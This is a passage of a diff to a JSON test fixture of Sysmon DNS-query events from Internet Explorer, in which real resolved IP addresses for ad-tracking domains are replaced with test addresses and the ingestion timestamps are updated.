SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4422,47 +4358,47 @@ "type": "CNAME" }, { - "data": "34.225.20.218", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.14.125", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.28.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.103.132", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.4.86.222", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.21.200.160", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.249.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.175.146", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -4478,20 +4414,13 @@ "ups.analytics.yahoo.com" ], "ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741334100Z", + "ingested": "2021-12-09T13:50:23.456804700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.611Z", @@ -4555,39 +4484,39 @@ "type": "CNAME" }, { - "data": "34.237.248.89", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.21.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.238.112", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.93.38", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.227.35.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.169.96.208", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.206.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.81.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4595,22 +4524,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -4626,23 +4555,16 @@ "pm.w55c.net" ], "ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741343Z", + "ingested": "2021-12-09T13:50:23.456810600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4702,11 +4624,11 @@ }, "answers": [ { - "data": "35.186.239.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4714,7 +4636,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4722,7 +4644,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4730,7 +4652,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -4738,7 +4660,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4746,23 +4668,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -4777,24 +4699,24 @@ "cm.eyereturn.com" ], "ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741351600Z", + "ingested": "2021-12-09T13:50:23.456816800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4858,12 +4780,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -4879,13 +4801,13 @@ "www.googletagservices.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741395500Z", + "ingested": "2021-12-09T13:50:23.456822500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4949,11 +4871,11 @@ "type": "CNAME" }, { - "data": "173.231.178.117", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4961,7 +4883,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4969,7 +4891,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4977,7 +4899,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -4985,7 +4907,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4994,16 +4916,16 @@ } ], "resolved_ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -5020,23 +4942,23 @@ "cm.adgrx.com" ], "ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741401200Z", + "ingested": "2021-12-09T13:50:23.456828200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5104,11 +5026,11 @@ "type": "CNAME" }, { - "data": "104.193.83.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5116,7 +5038,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5124,7 +5046,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5132,7 +5054,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5141,14 +5063,14 @@ } ], "resolved_ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -5166,21 +5088,21 @@ "csm2waycm-atl.netmng.com" ], "ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741407500Z", + "ingested": "2021-12-09T13:50:23.456834100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 